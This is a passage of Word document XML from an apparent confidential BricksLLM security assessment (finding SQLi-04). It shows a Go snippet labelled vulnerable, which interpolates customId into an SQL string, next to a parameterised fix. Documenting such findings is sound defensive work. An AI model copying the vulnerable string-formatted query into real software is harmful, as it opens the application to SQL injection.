    <w:p w14:paraId="7B6B8E3B" w14:textId="77777777" w:rsidR="003703C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F5"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>// BEFORE (vulnerable)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>query += fmt.Sprintf(" custom_id = '%s'", customId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// AFTER (safe)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>query += fmt.Sprintf(" custom_id = $%d", index)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>args = append(args, customId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>index++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683C75E0" w14:textId="77777777" w:rsidR="003703C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="999999"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>BricksLLM Security Assessment — SQLi-04 — GetEvents customId — Confidential</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="003703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496137">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="637302112">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="685062416">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1235431890">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1581671041">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="856651407">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1021856510">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1252616077">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="29263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3C8"/>
    <w:rsid w:val="00445CCC"/>
    <w:rsid w:val="005C3531"/>
    <w:rsid w:val="00A312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F4091"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{AAFA44AA-37DA-44DE-BB18-00E83A432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C35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ricks-cloud/BricksLL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Sandy</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-31T20:08:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>